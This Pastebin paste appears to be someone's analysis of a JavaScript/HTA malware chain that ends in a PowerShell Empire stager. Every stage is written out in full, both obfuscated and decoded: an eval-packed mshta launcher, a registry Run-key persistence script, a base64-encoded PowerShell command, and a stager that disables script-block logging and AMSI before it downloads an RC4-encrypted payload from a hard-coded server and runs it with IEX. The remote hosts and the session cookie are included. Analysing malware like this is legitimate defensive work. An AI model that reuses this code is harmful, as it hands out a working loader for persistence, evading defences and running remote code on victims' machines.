Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- nvo.js:
- eval(function(p,a,c,k,e,d){while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+c+'\\b','g'),k[c])}}return p}('4 3("2.1").5("6 9://8.7",0);',10,10,'|Shell|WScript|ActiveXObject|new|Run|mshta|cf|nvoassets|http'.split('|')))
- decodes to:
- //info.ActiveXObject WScript.Shell //eval new ActiveXObject("WScript.Shell").Run("mshta http://nvoassets.cf",0);
- at the end of http://nvoassets.cf/index.html is this:
- <script>
- var _0x292c=["\x57\x53\x63\x72\x69\x70\x74\x2E\x53\x68\x65\x6C\x6C","\x6D\x73\x68\x74\x61\x20\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x6D\x6F\x76\x65\x54\x6F\x28\x30\x78\x41\x43\x41\x42\x29\x3B\x6E\x65\x77\x25\x32\x30\x41\x63\x74\x69\x76\x65\x58\x4F\x62\x6A\x65\x63\x74\x28\x27\x57\x53\x63\x72\x69\x70\x74\x2E\x53\x68\x65\x6C\x6C\x27\x29\x2E\x52\x75\x6E\x28\x27\x6D\x73\x68\x74\x61\x25\x32\x30\x68\x74\x74\x70\x3A\x2F\x2F\x64\x61\x6E\x69\x6E\x66\x6F\x2E\x63\x66\x2F\x69\x6D\x67\x27\x2C\x30\x29\x3B\x63\x6C\x6F\x73\x65\x28\x29\x3B","\x48\x4B\x43\x55\x5C\x53\x6F\x66\x74\x77\x61\x72\x65\x5C\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x5C\x57\x69\x6E\x64\x6F\x77\x73\x5C\x43\x75\x72\x72\x65\x6E\x74\x56\x65\x72\x73\x69\x6F\x6E\x5C\x52\x75\x6E\x5C\x33\x66\x41\x30\x68","\x52\x45\x47\x5F\x53\x5A"];moveTo(0xCABA);w= new ActiveXObject(_0x292c[0]);m= _0x292c[1];w.RegWrite(_0x292c[2],m,_0x292c[3]);w.Run(m,0);close();
- </script>
- which decodes to
- WScript.Shellmshta javascript:moveTo(0xACAB);new%20ActiveXObject('WScript.Shell').Run('mshta%20http://daninfo.cf/img',0);close();HKCU\Software\Microsoft\Windows\CurrentVersion\Run\3fA0hREG_SZ
- that img file is:
- <html>
- <script>new ActiveXObject("WScript.Shell").Run("powershell -noP -sta -w 1 -enc SQBGACgAJABQAFMAVgBFAFIAcwBpAG8AbgBUAGEAQgBMAGUALgBQAFMAVgBFAHIAUwBJAG8AbgAuAE0AYQBKAG8AcgAgAC0AZwBFACAAMwApAHsAJABHAFAAUwA9AFsAUgBlAGYAXQAuAEEAcwBzAGUATQBCAEwAWQAuAEcARQB0AFQAWQBwAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAGUAVABGAEkAZQBgAEwAZAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4ARwBFAFQAVgBhAGwAVQBlACgAJABuAFUATABMACkAOwBJAEYAKAAkAEcAUABTAFsAJwBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0AKQB7ACQARwBQAFMAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQBbACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAD0AMAA7ACQARwBQAFMAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQBbACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnAF0APQAwAH0ARQBsAHMAZQB7AFsAUwBjAFIASQBQAHQAQgBsAE8AQwBrAF0ALgAiAEcARQBUAEYASQBlAGAAbABkACIAKAAnAHMAaQBnAG4AYQB0AHUAcgBlAHMAJwAsACcATgAnACsAJwBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAVABWAEEAbAB1AGUAKAAkAG4AVQBsAEwALAAoAE4ARQBXAC0ATwBiAGoAZQBDAFQAIABDAE8ATABMAEUAQwB0AEkATwBuAHMALgBHAGUAbgBlAFIASQBjAC4ASABBAFMAaABTAGUAVABbAHMAVAByAGkATgBHAF0AKQApAH0AWwBSAGUARgBdAC4AQQBTAHMAZQBNAGIAbABZAC4ARwBlAHQAVABZAFAARQAoACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzACcAKQB8AD8AewAkAF8AfQB8ACUAewAkAF8ALgBHAEUAVABGAGkAZQBMAEQAKAAnAGEAbQBzAGkASQBuAGkAdABGAGEAaQBsAGUAZAAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMAZQB0AFYAQQBsAHUARQAoACQAbgB1AEwAbAAsACQAVAByAFUARQApAH0AOwB9ADsAWwBTAHkAUwB0AGUAbQAuAE4ARQB0AC4AUwBlAHIAdgBJAEMAZQBQAG8AaQBuAHQATQBBAG4AQQBHAGUAcgBdADoAOgBFAFgAUABFAGMAVAAxADAAMABDAG8AbgBUAGkAbgB1AEUAPQAwADsAJAB3AGMAPQBOAGUAVwAtAE8AQgBKAEUAQwB0ACAAUwB5AHMAVABlAE0ALgBOAEUAdAAuAFcAZQBCAEMATABJAEUAbgBUADsAJAB1AD0AJwBNAG8AegBpAGwAbABhAC8ANQAuADAAIAAoAFcAaQBuAGQAbwB3AHMAIABOAFQAIAA2AC4AMQA7ACAAVwBPAFcANgA0ADsAIABUAHIAaQBkAGUAbgB0AC8ANwAuADAAOwAgAHIAdgA6ADEAMQAuADAAKQAgAGwAaQBrAGUAIABHAGUAYwBrAG8AJwA7ACQAdwBDAC4ASABlAGEAZABlAHIAUwAuAEEARABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAkAHUAKQA7ACQAdwBjAC4AUAByAE8AeABZAD0AWwBTAFkAUwB0AEUAbQAuAE4ARQBUAC4AVwBFAGIAUgBFAFEAdQBlAFMAVABdADoAOgBEAEUARgBBAFUAbAB0AFcARQBiAFAAcgBvAHgAWQA7ACQAdwBDAC4AUAByAE8AeAB5AC4AQwByAEUARABFAE4AdABpAEEATABzACAAPQAgAFsAUwBZAHMAdABFAG0ALgBOAEUAVAAuAEMAcgBlAGQARQBOAHQAaQBBAEwAQwBhAGMAaABlAF0AOgA6AEQARQBGAGEAdQBMAFQATgBFAFQAVwBPAHIAawBDAHIARQBEAGUATgBUAEkAQQBsAFMAOwAkAFMAYwByAGkAcAB0ADoAUAByAG8AeAB5ACAAPQAgACQAdwBjAC4AUAByAG8AeAB5ADsAJABLAD0AWwBTAFkAUwBUAEUAbQAuAFQAZQB4AHQALgBFAE4AYwBPAEQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBFAHQAQgBZAFQARQBzACgAJwBjAGgAewBpAEQAOAB0ADcAOgBmAG8AcABYACMARQBuAEYAJgAqAGwANgB2AC8ATwA5AGQAfQBqAHcAfAA1AFcAJwApADsAJABSAD0AewAkAEQALAAkAEsAPQAkAEEAcgBnAHMAOwAkAFMAPQAwAC4ALgAyADUANQA7ADAALgAuADIANQA1AHwAJQB7ACQASgA9ACgAJABKACsAJABTAFsAJABfAF0AKwAkAEsAWwAkAF8AJQAkAEsALgBDAG8AVQBuAHQAXQApACUAMgA1ADYAOwAkAFMAWwAkAF8AXQAsACQAUwBbACQASgBdAD0AJABTAFsAJABKAF0ALAAkAFMAWwAkAF8AXQB9ADsAJABEAHwAJQB7ACQASQA9ACgAJABJACsAMQApACUAMgA1ADYAOwAkAEgAPQAoACQASAArACQAUwBbACQASQBdACkAJQAyADUANgA7ACQAUwBbACQASQBdACwAJABTAFsAJABIAF0APQAkAFMAWwAkAEgAXQAsACQAUwBbACQASQBdADsAJABfAC0AQgBYAG8AcgAkAFMAWwAoACQAUwBbACQASQBdACsAJABTAFsAJABIAF0AKQAlADIANQA2AF0AfQB9ADsAJABzAGUAcgA9ACcAaAB0AHQAcAA6AC8ALwA4ADQALgAyADAAMAAuADYAOAAuADEAOAAxADoAOAAwADgAMAAnADsAJAB0AD0AJwAvAG4AZQB3AHMALgBwAGgAcAAnADsAJABXAGMALgBIAGUAYQBkAGUAcgBTAC4AQQBEAGQAKAAiAEMAbwBvAGsAaQBlACIALAAiAHMAZQBzAHMAaQBvAG4APQBzAEMAVABEADYAMgBPADUASgBlAFMANwBUAFIAcgBZAGIAMQArAHMAVQBxADEAYwB1ADEASQA9ACIAKQA7ACQARABBAFQAQQA9ACQAVwBDAC4ARABvAHcAbgBsAE8AYQBkAEQAYQBUAGEAKAAkAHMARQByACsAJABUACkAOwAkAEkAdgA9ACQARABBAHQAYQBbADAALgAuADMAXQA7ACQARABBAHQAQQA9ACQARABBAHQAYQBbADQALgAuACQAZABBAHQAQQAuAGwARQBOAEcAVABoAF0AOwAtAGoAbwBpAE4AWwBDAGgAYQBSAFsAXQBdACgAJgAgACQAUgAgACQAZABBAHQAYQAgACgAJABJAFYAKwAkAEsAKQApAHwASQBFAFgA",0); </script>
- <script src="http://daninfo.cf:443/jQuery.js"></script>
- </html>
- and decoded, which looks like powershell empire
- IF($PSVERsionTaBLe.PSVErSIon.MaJor -gE 3){$GPS=[Ref].AsseMBLY.GEtTYpE('System.Management.Automation.Utils')."GeTFIe`Ld"('cachedGroupPolicySettings','N'+'onPublic,Static').GETValUe($nULL);IF($GPS['ScriptB'+'lockLogging']){$GPS['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;$GPS['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}Else{[ScRIPtBlOCk]."GETFIe`ld"('signatures','N'+'onPublic,Static').SeTVAlue($nUlL,(NEW-ObjeCT COLLECtIOns.GeneRIc.HAShSeT[sTriNG]))}[ReF].ASseMblY.GetTYPE('System.Management.Automation.AmsiUtils')|?{$_}|%{$_.GETFieLD('amsiInitFailed','NonPublic,Static').SetVAluE($nuLl,$TrUE)};};[SyStem.NEt.ServICePointMAnAGer]::EXPEcT100ConTinuE=0;$wc=NeW-OBJECt SysTeM.NEt.WeBCLIEnT;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$wC.HeaderS.ADd('User-Agent',$u);$wc.PrOxY=[SYStEm.NET.WEbREQueST]::DEFAUltWEbProxY;$wC.PrOxy.CrEDENtiALs = [SYstEm.NET.CredENtiALCache]::DEFauLTNETWOrkCrEDeNTIAlS;$Script:Proxy = $wc.Proxy;$K=[SYSTEm.Text.ENcODing]::ASCII.GEtBYTEs('ch{iD8t7:fopX#EnF&*l6v/O9d}jw|5W');$R={$D,$K=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.CoUnt])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-BXor$S[($S[$I]+$S[$H])%256]}};$ser='http://84.200.68.181:8080';$t='/news.php';$Wc.HeaderS.ADd("Cookie","session=sCTD62O5JeS7TRrYb1+sUq1cu1I=");$DATA=$WC.DownlOadDaTa($sEr+$T);$Iv=$DAta[0..3];$DAtA=$DAta[4..$dAtA.lENGTh];-joiN[ChaR[]](& $R $dAta ($IV+$K))|IEX
Add Comment
Please, Sign In to add comment
